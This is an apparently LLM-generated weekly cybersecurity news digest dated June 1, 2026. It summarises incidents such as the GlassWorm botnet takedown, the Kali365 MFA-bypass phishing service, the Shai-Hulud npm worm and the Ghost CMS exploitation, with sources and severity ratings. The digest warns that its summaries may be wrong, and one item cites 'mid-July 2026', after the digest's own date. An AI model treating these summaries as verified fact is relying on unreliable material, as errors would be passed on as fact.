Weekly Review - June 01, 2026

Covers 7 daily digests (2026-05-26 to 2026-06-01).

All summaries, analysis, and story clustering are done by an LLM. It may make mistakes and say incorrect things. Check the sources and support the actual journalists.

Top Stories

1. GlassWorm botnet targeted open-source software ecosystem via trojanized Visual Studio extensions

4 outlets, 2026-05-27 to 2026-05-28 - severity 4/5

CrowdStrike, Google, and the Shadowserver Foundation conducted a coordinated operation to dismantle the GlassWorm botnet by simultaneously taking down four command-and-control (C2) channels, including the Solana blockchain, Google Calendar, the BitTorrent peer-to-peer network, and traditional VPS-hosted servers. Operating since at least early 2025, the GlassWorm malware targeted the open-source software ecosystem by distributing trojanized Visual Studio extensions via the OpenVSX marketplace. The attack chain utilized Unicode variation selectors to hide malicious code within editors to steal sensitive information, such as NPM, GitHub, and Git credentials, as well as cryptocurrency funds. The campaign impacted hundreds of software artifacts, including over 300 GitHub repositories and numerous Python projects, and deployed SOCKS proxy and hidden VNC servers for remote access to infected machines. Researchers attributed the threat actor to Russian origins based on the presence of Russian-language comments in the code and the avoidance of CIS countries. The coordinated takedown has severed the botnet's access to its critical C2 services, though the theft of credentials poses an ongoing risk of supply chain compromise.

Sources

• GlassWorm Botnet Disrupted - SecurityWeek, 2026-05-27 (quality: 20/21)
• CrowdStrike disrupts Glassworm botnet that preyed on open-source supply chain - CyberScoop, 2026-05-27 (quality: 20/21)
• Glassworm botnet disrupted after resilient C2 infrastructure takedown - BleepingComputer, 2026-05-27 (quality: 20/21)
• Coordinated operation takes down Glassworm botnet - Cybersecurity Dive - Latest News, 2026-05-27 (quality: 9/21)

2. Kali365 PhaaS platform targets Microsoft 365 accounts using device code authentication

5 outlets, 2026-05-26 to 2026-05-29 - severity 4/5

The Kali365 phishing-as-a-service (PhaaS) platform targets Microsoft 365 accounts by utilizing OAuth device code authentication and adversary-in-the-middle (AitM) techniques to bypass multi-factor authentication (MFA). The attack chain involves sending phishing emails disguised as legitimate notifications, such as Teams invites, which instruct victims to enter a short device code on a genuine Microsoft verification page. This process allows attackers to capture OAuth access and refresh tokens, granting them unauthorized access to mailboxes, OneDrive, SharePoint, and other single-sign-on applications like Salesforce. The service, which operates via a subscription-based model involving admins, resellers, and affiliates, has been observed targeting organizations across North America and Europe since April 2026. In response to the widespread campaign, the FBI and the Internet Crime Complaint Center issued advisories, and security researchers recommend using Conditional Access policies to restrict or block device code authentication flows.

Sources

• FBI warns of Kali365 phishing service targeting Microsoft 365 accounts - BleepingComputer, 2026-05-25 (quality: 20/21)
• FBI warns of Kali365 phishing kit that breaks into Microsoft 365 accounts – no password required - GRAHAM CLULEY, 2026-05-26 (quality: 17/21)
• FBI warns about PhaaS platform used to access Microsoft 365 environments - Cybersecurity Dive - Latest News, 2026-05-26 (quality: 10/21)
• Kali365 phishing kit bypasses MFA and steals Microsoft logins - Malwarebytes, 2026-05-27 (quality: 14/21)
• ThreatsDay Bulletin: Claude Security Plugin, Azure Priv-Esc, Kali365 MFA Bypass, FIFA Scams +15 More - The Hacker News, 2026-05-28 (quality: 9/21)

3. TeamPCP uses Shai-Hulud worm to poison npm packages and developer components

2 outlets, 2026-05-26 to 2026-06-01 - severity 5/5

The threat actor TeamPCP has executed multiple supply chain campaigns, including the use of the Shai-Hulud self-replicating worm to poison npm packages and infect downstream developer components. The attack chain involved harvesting OIDC credentials during the TanStack wave and utilizing compromised maintainer accounts to push malicious updates, such as the @antv npm ecosystem breach and the trojanization of a Microsoft-published Python SDK. The scope of the intrusion extended to the Visual Studio Marketplace via a malicious Nx Console extension, with downstream victims including OpenAI, Grafana Labs, and Mistral AI. Technically, the group weaponized SLSA provenance attestation to facilitate the worm's replication and has utilized malware like GlassWorm for ransomware and data theft. Following the compromise of GitHub's internal codebase, the group released the Shai-Hulud source code, which researchers suggest may serve to scale the attack's potential through a new affiliate program.

Sources

• TeamPCP Supply Chain Campaign: Activity Through 2026-05-24, (Mon, May 25th) - SANS Internet Storm Center, InfoCON: green, 2026-05-25 (quality: 20/21)
• TeamPCP Supply Chain Campaign: Activity Through 2026-05-24, (Mon, May 25th) - SANS Internet Storm Center, InfoCON: green, 2026-05-25 (quality: 20/21)
• The Hackers Behind Shai-Hulud: Lucky or Skilled? - darkreading, 2026-05-26 (quality: 19/21)

4. Silent Ransom Group targets U.S. law firms through social engineering campaigns

5 outlets, 2026-05-27 to 2026-05-28 - severity 3/5

The Silent Ransom Group, also tracked as Luna Moth, Chatty Spider, and UNC3753, targets U.S.-based law firms and financial organizations through a combination of social engineering and physical access. Emerging in 2022 following the disbanding of the Conti ransomware syndicate, the group utilizes phishing emails and fraudulent IT support calls to establish remote desktop sessions. If remote access fails, actors physically visit victim locations to insert USB drives or external hard drives into workstations under the pretext of performing backups or device imaging. The group exfiltrates stolen data using tools such as WinSCP and Rclone, or by transferring files to cloud platforms like Google Drive and Microsoft OneDrive, to facilitate extortion via the threat of data publication. The FBI has issued multiple warnings regarding these campaigns, which have been active since at least 2022 and have contributed to an uptick in attacks against the legal sector. As of early 2026, the group has claimed responsibility for over 100 attacks, contributing to a broader trend where the legal sector accounted for more than 6% of all tracked ransomware incidents in the first quarter of the year.

Sources

• FBI warns of in-person data theft attacks from extortion gang - BleepingComputer, 2026-05-27 (quality: 19/21)
• FBI: Hackers Sending Operatives in Person to Insert USB Drives and Steal Data - SecurityWeek, 2026-05-27 (quality: 19/21)
• FBI warns US-based law firms to be on the lookout for cybercrime group that steals data in person - CyberScoop, 2026-05-27 (quality: 20/21)
• FBI warns extortion hackers are visiting US law firms to steal data - The Record from Recorded Future News, 2026-05-27 (quality: 19/21)
• Ransomware Actors Show Up In Person to Steal Law Firm Data - darkreading, 2026-05-27 (quality: 11/21)

5. Credential-stuffing attack using MyHeritage breach data targeted 23andMe customer accounts

2 outlets, 2026-05-29 to 2026-05-30 - severity 4/5

A credential-stuffing attack targeted 23andMe (now Chrome Holding Co.), leveraging stolen credentials from a 2017 MyHeritage data breach to access approximately 7 million customer accounts. The breach exposed highly sensitive information, including raw genetic data, health reports, ancestry details, and the identities and locations of biological relatives. The attack was facilitated by a failure to implement multi-factor authentication and a coding error in the "DNA Relatives" feature that allowed unauthorized access to accounts not even using that specific service. In response to the incident, 23andMe reached a $50 million settlement in 2024 to resolve U.S. customer claims, though the company subsequently filed for bankruptcy. The California Attorney General has since filed a lawsuit against Chrome Holding Co., alleging violations of several state privacy and consumer protection laws and seeking statutory penalties.

Sources

• California Sues 23andMe, Alleging It Failed to Protect User Data in 2023 Breach - SecurityWeek, 2026-05-29 (quality: 19/21)
• California AG sues 23andMe over 2023 breach exposing health data - BleepingComputer, 2026-05-29 (quality: 17/21)

6. Nightmare Eclipse discloses Windows zero-day vulnerabilities through the Nightmare Eclipse campaign

2 outlets, 2026-05-29 to 2026-05-30 - severity 4/5

The Nightmare Eclipse campaign involved the uncoordinated public disclosure of multiple Windows zero-day vulnerabilities, including BlueHammer, UnDefend, RedSun, YellowKey, GreenPlasma, and MiniPlasma. Beginning in April 2026, the actor released these vulnerabilities alongside working proof-of-concept code on GitHub, leading to the confirmed exploitation of BlueHammer, UnDefend, and RedSun in live intrusions. In response to these disclosures, GitHub removed the Nightmare Eclipse account and their associated Blogger page went offline. Microsoft condemned the uncoordinated releases as unjustifiable and indicated that its Digital Crimes Unit may pursue legal action against those enabling criminal activity. As of mid-July 2026, the actor has threatened a further release of vulnerabilities scheduled for Microsoft's Patch Tuesday.

Sources

• Microsoft Slams Public Zero-Day Disclosures Amid GitHub Researcher Account Removal - The Hacker News, 2026-05-28 (quality: 10/21)
• Microsoft calls zero-day releases ‘never justifiable’ as researcher threatens to drop more - The Record from Recorded Future News, 2026-05-29 (quality: 20/21)

7. Ababil of Minab Breached LACMTA Causing Data Exfiltration and System Destruction

3 outlets, 2026-05-27 to 2026-05-28 - severity 4/5

The Iranian-linked threat actor Ababil of Minab breached the Los Angeles County Metropolitan Transportation Authority (LACMTA) in March 2026, causing significant internal operational disruptions. The attackers accessed core virtualization management platforms, Microsoft IIS web servers, and operational technology systems used for train monitoring, resulting in the exfiltration of over 1TB of data and the wiping of hundreds of terabytes of server contents. Forensic analysis by Gambit Security linked the group's infrastructure and custom exfiltration tools to the Ministry of Intelligence of the Islamic Republic of Iran (MOIS) and the group Black Shadow. The attack involved the destruction of databases, virtual machines, and backup infrastructure through both manual activity and automated scripts to prevent system recovery. Beyond the LA Metro breach, the group targeted various organizations in Israel, Turkey, and Saudi Arabia, including media organizations, universities, and insurance brokerages.

Sources

• Iranian government, not hacktivist group, breached LA Metro system, security firm says - Cybersecurity Dive - Latest News, 2026-05-26 (quality: 10/21)
• Iranian intelligence service behind hack of LA transit system, researchers say - The Record from Recorded Future News, 2026-05-27 (quality: 19/21)
• LA Metro Cyberattack Linked to Iranian State-Sponsored Hackers - SecurityWeek, 2026-05-27 (quality: 20/21)

8. Attackers exploit Ghost CMS vulnerability to target universities and DuckDuckGo

2 outlets, 2026-05-26 - severity 4/5

Attackers exploited a critical SQL injection vulnerability (CVE-2026-26980) in Ghost CMS versions 3.24.0 through 6.19.0 to compromise over 700 websites, including those of Harvard University, Oxford University, and DuckDuckGo. By leveraging the flaw to steal Admin API keys, the actors injected malicious JavaScript into posts and pages to initiate ClickFix malware campaigns. These campaigns present users with fraudulent Cloudflare or CAPTCHA verification prompts that instruct them to execute commands via the Windows Run dialog or PowerShell to install malware. At least two different threat groups have been observed conducting these poisoning operations, sometimes competing to implant different malicious code on the same compromised sites.

Sources

• 700+ education and tech websites hijacked in huge ClickFix malware campaign - Malwarebytes, 2026-05-26 (quality: 12/21)
• Ghost CMS Vulnerability Exploited to Hack Over 700 Websites - SecurityWeek, 2026-05-25 (quality: 18/21)

Under the Radar

High-severity stories that received limited coverage this period.

Megalodon malware campaign injected malicious GitHub Actions workflows into GitHub repositories

1 outlet, 2026-05-27 - severity 4/5

The Megalodon malware campaign executed an automated attack that injected malicious GitHub Actions workflows into 5,561 GitHub repositories via 5,718 malicious commits. The attack utilized a two-part payload consisting of a "SysDiag" YAML file to create new workflows and a secondary payload that replaced existing workflows with a "workflow-dispatch" trigger to establish a stealth backdoor. This mechanism enabled the exfiltration of CI/CD secrets, cloud credentials, SSH keys, OpenID Connect tokens, and source code to a command-and-control server. While researchers have noted surface-level similarities to the TeamPCP Shai-Hulud worm, no direct attribution has been confirmed. As of one week after the initial six-hour attack window, approximately 2,900 repositories remained infected.

Why it matters: Confirmed widespread exploitation of thousands of repositories to exfiltrate critical CI/CD secrets, cloud credentials, and source code.

Sources

• Feeding Frenzy: 'Megalodon' Malware Infects Thousands of GitHub Repos - darkreading, 2026-05-26 (quality: 20/21)

Russia uses cyberattacks against European firms to bypass international sanctions

1 outlet, 2026-05-31 - severity 4/5

Russia is utilizing a network of front companies, intermediaries, and cyber operations to bypass international sanctions and procure advanced Western technologies, including machine tools, dual-use software, and components for military systems like the Gripen fighter jet. Intelligence agencies from Sweden, Finland, the UK, and Estonia have identified these procurement efforts targeting high-end research in space, quantum, and marine technology. The operation includes cyberattacks against European firms and critical infrastructure to gather intelligence and facilitate the acquisition of civilian-use camera and laser technology for weapons integration. Recent enforcement actions include the arrest of two individuals in Sweden for violating sanctions via a Turkish company, while Russian-linked intrusions have also targeted European power plants.

Why it matters: Confirmed widespread use of cyber operations and shell companies to bypass sanctions and procure dual-use technology for Russian military use.

Sources

• Russian Spies Are Aggressively Seeking Western Technology as Sanctions Bite, Officials Say - SecurityWeek, 2026-05-30 (quality: 20/21)

Unknown threat actor exploited Marimo notebooks vulnerability to exfiltrate PostgreSQL database

1 outlet, 2026-05-30 - severity 4/5

An unknown threat actor exploited CVE-2026-39987, a critical pre-authenticated remote code execution vulnerability in Marimo notebooks, to access an internet-reachable instance and retrieve cloud credentials. Using an LLM agent to navigate the environment, the attacker retrieved an SSH private key from AWS Secrets Manager and accessed a downstream SSH bastion server. The attack chain, which lasted approximately one hour, resulted in the exfiltration of the schema and full contents of an internal PostgreSQL database. Evidence of the LLM agent's involvement included the use of machine-formatted command delimiters and a Chinese-language planning comment within the command stream.

Why it matters: Confirmed exploitation of a critical RCE vulnerability led to the successful exfiltration of an entire internal PostgreSQL database.

Sources

• Attackers Use LLM Agent for Post-Exploitation After Marimo CVE-2026-39987 Exploit - The Hacker News, 2026-05-29 (quality: 20/21)

Nimbus Manticore targets aviation, software, and energy sectors with MiniFast malware

1 outlet, 2026-05-26 - severity 4/5

The Iranian state-sponsored threat actor Nimbus Manticore deployed MiniFast and MiniJunk V2 malware through phishing, fake meeting invitations, and SEO poisoning to target organizations in the aviation, software, and energy sectors across the U.S., Europe, and the Middle East. The attack chain involved AppDomain hijacking to deliver MiniJunk via ZIP archives and the distribution of a trojanized Oracle SQL Developer installer via a fraudulent download page. MiniFast functions as a backdoor capable of remote command execution, file operations, and privilege escalation, with features suggesting the use of artificial intelligence in its development. Beyond software-based espionage, the actor also exploited unprotected automatic tank gauge systems at U.S. gas stations to manipulate fuel display readings.

Why it matters: Confirmed widespread APT campaigns targeting critical sectors with new malware and documented espionage against U.S.

Sources

• Iranian Hackers Deploy MiniFast and MiniJunk V2 via Phishing and SEO Poisoning - The Hacker News, 2026-05-26 (quality: 20/21)

All Stories by Category

Vulnerabilities & Patches

• OpenClaw Vulnerabilities Prompt Nvidia to Launch Secure NemoClaw Framework (2026-05-27, 1 outlet, severity 4/5)
  • For Enterprises, Security Remains Agentic AI's Biggest Challenge - darkreading
• FortiClient EMS Flaw Exploited to Deploy Credential-Stealing Malware (2026-05-29, 1 outlet, severity 4/5)
  • Threat Actors Exploit Critical FortiClient EMS Flaw to Deploy Credential Stealer - The Hacker News
• Kaspersky Finds Critical CVEs and Risks in Docker Hub Images (2026-05-29, 1 outlet, severity 3/5)
  • What’s in the container? Analyzing vulnerabilities, risks and protection with Kaspersky Container Security and the KIRA AI assistant - Securelist
• Anthropic’s Mythos Model Uncovers 10,000 Critical Software Vulnerabilities (2026-05-27, 1 outlet, severity 3/5)
  • Anthropic: Mythos finds more than 10,000 software flaws in first month - CyberScoop
• Use EPSS and EvidenceForge to Optimize Vulnerability Management Strategies (2026-05-29, 1 outlet, severity 3/5)
  • Less panic patching, more precision - Cisco Talos Blog
• Conference Software Flaw Enables Guaranteed Talk Acceptance for Attackers (2026-05-28, 1 outlet, severity 3/5)
  • Vulnerability in Popular Conference Software Granted Attackers a 100% Talk Acceptance Rate - SecurityWeek
• Orthanc Server Vulnerability Triggered via DICOM Heap Overflow Exploit (2026-05-28, 1 outlet, severity 2/5)
  • DICOM, Pydicom, GDCM, and Orthanc: A technical tour of what really happens in the heap - Cisco Talos Blog
• Cox Media Group fined for false "Active Listening" claims. (2026-05-27, 1 outlet, severity 2/5)
  • Company bragged phone mics could listen to conversations. They couldn’t. - Malwarebytes
• search-for-compression.py Now Detects Compressed VBA in Microsoft Access (2026-05-26, 1 outlet, severity 2/5)
  • Microsoft Access VBA, (Mon, May 25th) - SANS Internet Storm Center, InfoCON: green
• IBM and Red Hat Launch Project Lightwell to Fix Open-Source Vulnerabilities (2026-05-29, 2 outlets, severity 1/5)
  • IBM’s new $5B initiative will help enterprises rapidly patch open-source vulnerabilities - Cybersecurity Dive - Latest News
  • IBM and Red Hat Commit $5 Billion to Secure Open Source Supply Chains Under “Project Lightwell” - SecurityWeek

Data Breaches

• ShinyHunters Leaks Charter Communications Data Affecting Millions of Users (2026-05-30, 1 outlet, severity 4/5)
  • Charter Communications Data Breach Could Impact Nearly 5 Million - SecurityWeek
• 7-Eleven, GitHub, and Grafana Labs Face Recent Cyber Breaches (2026-05-26, 1 outlet, severity 4/5)
  • 25th May – Threat Intelligence Report - Check Point Research
• Lithuania Investigates Massive Data Leak From National Register Databases (2026-05-26, 1 outlet, severity 4/5)
  • Lithuania Suspects Foreign Involvement in Data Leak of Over 600,000 National Register Entries - SecurityWeek
• ShinyHunters breached 7-Eleven Salesforce environment to leak personal information (2026-05-26, 2 outlets, severity 3/5)
  • 7-Eleven data breach exposes personal information of 185,000 people - BleepingComputer
  • 185,000 Likely Impacted by 7-Eleven Data Breach - SecurityWeek
• Lithuania’s Centre of Registers Investigated After 600,000 Records Stolen (2026-05-27, 1 outlet, severity 3/5)
  • Lithuania investigates theft of 600,000 state registry records by foreign actor - The Record from Recorded Future News
• ShinyHunters Breaches Drive Growing Delays in Corporate Data Disclosures (2026-06-01, 1 outlet, severity 3/5)
  • 1,000 Data Breaches Later, the Disclosure Lag is Worse Than Ever - Troy Hunt
• Uruguayan Citizen Data Leaked in Massive 5.8 Million Record Breach (2026-05-28, 1 outlet, severity 3/5)
  • Latin American Cybercriminals Hoover Up Government Data - darkreading
• ShinyHunters Leaks DentaQuest Data and Targets BCD Travel (2026-06-01, 1 outlet, severity 3/5)
  • Weekly Update 506 - Troy Hunt
• BtCIRT Joins Have I Been Pwned to Monitor Government Domains (2026-05-26, 1 outlet, severity 2/5)
  • Welcoming the Bhutanese Government to Have I Been Pwned - Troy Hunt

Ransomware

• Akira Ransomware Attack Traced Through Correlated VPN and Endpoint Logs (2026-05-28, 1 outlet, severity 3/5)
  • Reconstructing an Akira Ransomware Kill Chain from Perimeter and Endpoint Logs, (Wed, May 27th) - SANS Internet Storm Center, InfoCON: green
• Storm-2697’s The Gentlemen Ransomware Uses Go-Based Self-Propagation Tactics (2026-05-29, 1 outlet, severity 3/5)
  • The Gentlemen ransomware: Dissecting a self-propagating Go encryptor - Threat intelligence | Microsoft Security Blog
• Play Ransomware Gang Claims Breach of MyPillow, Company Denies (2026-05-29, 1 outlet, severity 2/5)
  • MyPillow listed on ransomware gang’s leak site, but denies it has been breached - GRAHAM CLULEY

Supply Chain Attacks

• SymJack Attack Exploits AI Coding Agents for Supply Chain Attacks (2026-05-27, 1 outlet, severity 4/5)
  • ‘SymJack’ Attack Turns AI Coding Agents Into Supply Chain Attack Delivery Systems - SecurityWeek
• codexui-android npm package steals OpenAI Codex authentication tokens (2026-06-01, 1 outlet, severity 3/5)
  • OpenAI Codex Authentication Tokens Stolen in codexui-android npm Supply Chain Attack - The Hacker News
• Malicious Sicoob.Sdk NuGet Package Steals Banking Credentials and Certificates (2026-05-29, 1 outlet, severity 3/5)
  • Malicious Sicoob NuGet Steals Banking Credentials as npm Packages Target Cloud Secrets - The Hacker News
• Malware-Slop npm package steals Claude AI user files via GitHub (2026-05-28, 1 outlet, severity 3/5)
  • Malicious npm Package Stole Files From Claude AI User Directory via GitHub - The Hacker News

Nation-State / APT

• Catalin Dragomir Hacked Oregon Department of Emergency Management and American Companies (2026-05-27 to 2026-05-29, 3 outlets, severity 3/5)
  • Romanian Hacker Sentenced to Prison in US for Selling Access to State Network - SecurityWeek
  • Romanian national sentenced to more than 4 years for hacking Oregon government systems - The Record from Recorded Future News
  • Romanian gets 5 years in prison for hacking Oregon govt network - BleepingComputer
• GreyVibe uses AI tools for cyberespionage attacks against Ukrainian organizations (2026-05-29, 3 outlets, severity 3/5)
  • GreyVibe hackers use ChatGPT, Gemini to power cyberattacks - BleepingComputer
  • Russia-Linked ‘GreyVibe’ Attackers Use AI to Supercharge Cyberattacks - SecurityWeek
  • New Russian-Linked GREYVIBE Targets Ukraine with AI-Powered Cyberattacks - The Hacker News
• MuddyWater Uses DLL Side-Loading for Global Espionage Campaign (2026-05-27, 1 outlet, severity 4/5)
  • MuddyWater Uses DLL Side-Loading in Espionage Campaign Targeting 9 Countries - The Hacker News
• Russia uses hybrid warfare and AI to target UK critical infrastructure (2026-05-28, 2 outlets, severity 3/5)
  • UK spy chief labels AI ‘unstoppable force’ with offensive, defensive ramifications for cyberspace - CyberScoop
  • UK Cyberspying Chief Calls AI ‘an Unstoppable Force’ and Warns About Russia - SecurityWeek
• Check Point Report: Election Threats Target Campaigns, Not Voting Machines (2026-06-01, 1 outlet, severity 3/5)
  • Election threats are focused on campaign systems, not voting machines - CyberScoop
• GCHQ Chief Warns Russia Launches Daily Hybrid Attacks on UK (2026-05-29, 1 outlet, severity 3/5)
  • Russia conducting daily attacks on UK 'from seabed to cyberspace,' spy chief warns - The Record from Recorded Future News
• Unknown hackers used Ravage framework to target Russian maritime institutions (2026-06-01, 1 outlet, severity 3/5)
  • Unknown hacker group targeted Russian maritime universities, diplomats for nearly two years - The Record from Recorded Future News
• Andrei Kozlov, linked to Fancy Bear, joins Russia's Security Council (2026-05-26, 1 outlet, severity 3/5)
  • Kremlin appoints cyber executive with alleged GRU ties to Security Council role - The Record from Recorded Future News
• Kimsuky Uses HTTPSpy and VS Code Tunnels to Target South Korea (2026-05-29, 1 outlet, severity 3/5)
  • Kimsuky Deploys HTTPSpy, Expands Arsenal with HelloDoor and VS Code Tunnels - The Hacker News

Malware & Botnets

• RondoDox Botnet Targets ASUS Routers Amid Rising Linux Vulnerabilities (2026-05-26, 1 outlet, severity 4/5)
  • ⚡ Weekly Recap: Linux Flaws, Defender 0-Days, Router Botnets, and Supply Chain Chaos - The Hacker News
• Threat actors use ChatGPT features to distribute malware targeting Windows and macOS users (2026-05-28 to 2026-05-30, 2 outlets, severity 3/5)
  • Fake ChatGPT download site infects Windows and Mac users with malware - Malwarebytes
  • ChatGPT share links abused to host fake outage pages to deliver malware - BleepingComputer
• Grandoreiro and BTMOB Malware Target Windows and Android Users (2026-05-28, 1 outlet, severity 3/5)
  • Grandoreiro Malware and BTMOB RAT Campaigns Target Windows and Android Users - The Hacker News
• DinDoor RAT distributed via fake software on GitHub and SourceForge (2026-05-27, 1 outlet, severity 3/5)
  • Fake software on GitHub and SourceForge distribute Deno RAT - Malwarebytes
• Flare Research Reveals Evolution of DDoS-as-a-Service Market Trends (2026-05-30, 1 outlet, severity 3/5)
  • From $5 Attacks to Botnet-Powered Platforms: Inside the DDoS-as-a- Service Market - BleepingComputer
• Unit 42 Report: Shai-Hulud Malware and Evolving Cyber Extortion Tactics (2026-05-28, 1 outlet, severity 3/5)
  • Out of the Crypt: The Evolving Cyber Extortion Economy - Unit 42
• SmartApeSG ClickFix Campaign Deploys NetSupport RAT via Malicious Scripts (2026-06-01, 1 outlet, severity 3/5)
  • Unidentified RAT pushes NetSupport RAT, (Mon, Jun 1st) - SANS Internet Storm Center, InfoCON: green
• ClickFix Malware and Carnival Data Breach Highlight Weekly Security Threats (2026-06-01, 1 outlet, severity 3/5)
  • A week in security (May 25 – May 31) - Malwarebytes
• DShield Sensor Analysis Reveals Yearly Trends in Malicious File Uploads (2026-05-29, 1 outlet, severity 2/5)
  • Analysis of a Year of Files Uploaded to DShield Sensors, (Wed, May 27th) - SANS Internet Storm Center, InfoCON: green
• Microsoft Defender for Endpoint Now Automatically Isolates Compromised Devices (2026-05-26, 1 outlet, severity 1/5)
  • Microsoft Defender can now automatically isolate hacked endpoints - BleepingComputer
• Proofpoint Launches Active Exploits Protection to Combat Real-World Attacks (2026-05-27, 1 outlet, severity 1/5)
  • Proofpoint Introduces Active Exploits Protection to Help Organizations Prioritize Vulnerability Patching for Real-World Attacks in the AI Era - Proofpoint News Feed
• YARA-X 1.17.0 Release Features Performance Enhancements and Bugfix (2026-06-01, 1 outlet, severity 1/5)
  • YARA-X 1.17.0 Release, (Sun, May 31st) - SANS Internet Storm Center, InfoCON: green

Phishing & Social Engineering

• GHOST STADIUM campaign uses phishing domains to target FIFA for fraud (2026-05-29, 2 outlets, severity 3/5)
  • FBI warns of fake FIFA websites running World Cup fraud schemes - BleepingComputer
  • Chinese-speaking fraud gang could be stealing millions from 2026 World Cup fans - The Record from Recorded Future News
• Threat actors use BTMOB Android malware to target users via phishing (2026-05-29, 2 outlets, severity 3/5)
  • BTMOB Android malware service generates custom phishing payloads - BleepingComputer
  • New BTMOB Android Malware Enables Full Device Takeover - SecurityWeek
• ACR Stealer distributed via fake Claude impersonation websites (2026-05-26, 1 outlet, severity 3/5)
  • Possible ACR Stealer From Page Impersonating Claude, (Tue, May 26th) - SANS Internet Storm Center, InfoCON: green
• Adobe Target infrastructure used in LinkedIn phishing tracking campaign (2026-05-27, 1 outlet, severity 3/5)
  • Fake LinkedIn emails abuse Adobe to track victims - Malwarebytes
• Signal users targeted by phishing attacks stealing backup recovery keys (2026-05-29, 1 outlet, severity 3/5)
  • Signal users targeted in backup-stealing phishing attacks - Malwarebytes
• Trump Mobile Data Breach and FIFA World Cup Phishing Alerts (2026-05-30, 1 outlet, severity 3/5)
  • In Other News: Trump Mobile Data Breach, FIFA World Cup Phishing, CISA Responds to Supply Chain Attacks - SecurityWeek
• MokN Secures $15 Million to Expand Phish-Back Platform Globally (2026-05-30, 1 outlet, severity 1/5)
  • MokN Raises $15 Million for Phish-Back Platform - SecurityWeek

Cloud & Infrastructure Security

• Token Security Discovers Exploit Chain Threatening Zapier Platform Takeover (2026-05-30, 1 outlet, severity 3/5)
  • With Complex Cloud Integrations, Small Errors Lead to Major Compromises - darkreading
• Red Access Report: 2,000 Vibe-Coded Apps Expose Sensitive Data (2026-05-29, 1 outlet, severity 3/5)
  • What 2,000 Exposed Vibe-Coded Apps Reveal About the Limits of Most Security Stacks - The Hacker News
• Microsoft MFA and My Sign-Ins Platform Face Service Outage (2026-06-01, 1 outlet, severity 2/5)
  • Microsoft confirms outage affecting MFA, My Sign-Ins platform - BleepingComputer
• CISOs Must Assess Security Risks in Sovereign-Cloud Adoption (2026-05-29, 1 outlet, severity 2/5)
  • How CISOs can manage sovereign-cloud security risks - Cybersecurity Dive - Latest News
• Google Cloud Launches AI Threat Defense to Combat Cyberattacks (2026-05-28, 1 outlet, severity 1/5)
  • Google Unveils AI Threat Defense Platform to Fight AI-Powered Cyberattacks - SecurityWeek
• Kaseya SIEM helps MSPs unify data and reduce alert fatigue (2026-05-29, 1 outlet, severity 1/5)
  • How SIEM helps MSPs reduce noise and stop threats faster - BleepingComputer

Identity & Access Management

• Yanluowang Used MFA Prompt Bombing to Breach Cisco VPN (2026-05-26, 1 outlet, severity 4/5)
  • MFA Prompt Bombing: Why Your Second Factor Isn't Saving You - The Hacker News
• Scattered Spider Uses Stolen Credentials to Bypass Modern Security (2026-05-27, 1 outlet, severity 3/5)
  • The Credential Crisis: How Stolen Credentials Defeat Modern Security - SecurityWeek
• CISA contractor leaks credentials on GitHub and Oura ring privacy risks (2026-05-28, 1 outlet, severity 3/5)
  • Smashing Security podcast #469: What your Oura ring won’t tell you - GRAHAM CLULEY
• Active Directory: Use Passphrases and Self-Service to Simplify Security (2026-05-28, 1 outlet, severity 1/5)
  • Can you enforce strong Active Directory password rules without frustrating users? - BleepingComputer

AI & Machine Learning Security

• Bissa Scanner and Agentic Config Files Drive AI Cyberattacks (2026-05-26, 1 outlet, severity 4/5)
  • AI Threat Landscape Digest March-April 2026 - Check Point Research
• ChatGPhish Vulnerability Exploits ChatGPT Summaries for Phishing Attacks (2026-05-30, 1 outlet, severity 3/5)
  • ChatGPhish Vulnerability Turns ChatGPT Web Summaries Into a Phishing Surface - The Hacker News
• Pentagon AI Push Faces Pushback From Military Leaders Over Oversight (2026-06-01, 1 outlet, severity 3/5)
  • As the Pentagon Pushes for Battlefield AI, Some Military Leaders Urge Caution - SecurityWeek
• LayerX Security Report: Top 5% of Users Drive AI Risk (2026-05-28, 1 outlet, severity 3/5)
  • New AI Usage Report: Enterprise AI Risk Is Heavily Concentrated Among a Small Group of AI "Power users" - The Hacker News
• AI-Assisted Exploit Development Outpaces Security Scanner Detection Capabilities (2026-05-28, 1 outlet, severity 3/5)
  • AI-Assisted Exploit Development Outpaces Scanner Detection - darkreading
• Cisco Report: Multi-turn Prompts Increase Vulnerability in Leading AI Models (2026-05-28, 1 outlet, severity 2/5)
  • Leading AI models are more vulnerable to malicious prompts than vendors claim - Cybersecurity Dive - Latest News
• House Subcommittee to Hold Hearing on AI’s Cybersecurity Impact (2026-05-29, 1 outlet, severity 2/5)
  • House panel poised to hold hearing centered on AI impact on cyber - CyberScoop
• DockSec uses AI to automate Docker image vulnerability fixes (2026-05-26, 1 outlet, severity 2/5)
  • Open Source DockSec Uses AI to Cut Through Vulnerability Noise in Docker Images - SecurityWeek
• Securing Generative AI: Four Essential Data Protection Best Practices (2026-06-01, 1 outlet, severity 2/5)
  • Top 4 data security best practices for the AI-enabled enterprise - Cybersecurity Dive - Latest News
• Enterprise Data Risks Rise as Shadow AI Tools Expand (2026-05-29, 1 outlet, severity 2/5)
  • Enterprise data is creeping its way into shadow AI tools - Cybersecurity Dive - Latest News
• Agentic AI Risks Stem From Flawed Organizational Deployment Strategies (2026-05-29, 1 outlet, severity 2/5)
  • Agentic AI Isn't Risky; the Way Orgs Deploy It Is - darkreading
• Managing Shadow AI: Five Steps to Secure Corporate Data (2026-05-28, 1 outlet, severity 2/5)
  • 5 Steps to Managing Shadow AI Tools Without Slowing Down Employees - The Hacker News
• Anthropic rolls out Claude Mythos model with new security platform integrations (2026-05-26, 2 outlets, severity 1/5)
  • Anthropic’s restricted Claude Mythos model may be coming to Claude Code - BleepingComputer
  • Anthropic Expands Claude’s Enterprise Security Governance With 28 New Integrations - SecurityWeek
• Edamame Technologies Launches Security Platform to Monitor AI Coding Agents (2026-05-28, 1 outlet, severity 1/5)
  • New Edamame Platform Aims to Catch AI Coding Agents Going Off the Rails - SecurityWeek
• AI Agents Drive New Era of Machine-Speed Cyber Attacks (2026-05-28, 1 outlet, severity 1/5)
  • Raising the Cybersecurity Stakes: Ante up for the Agentic Era - SecurityWeek
• Anthropic Launches Claude Sandbox and New Security Guidance Plugin (2026-05-27, 1 outlet, severity 1/5)
  • Anthropic Releases New Claude Sandbox, Security Guidance Plugin - SecurityWeek
• SecurityWeek AI Risk Summit Coming to Half Moon Bay (2026-05-28, 1 outlet, severity 1/5)
  • SecurityWeek to Host AI Risk Summit August 11-12 at the Ritz-Carlton, Half Moon Bay - SecurityWeek
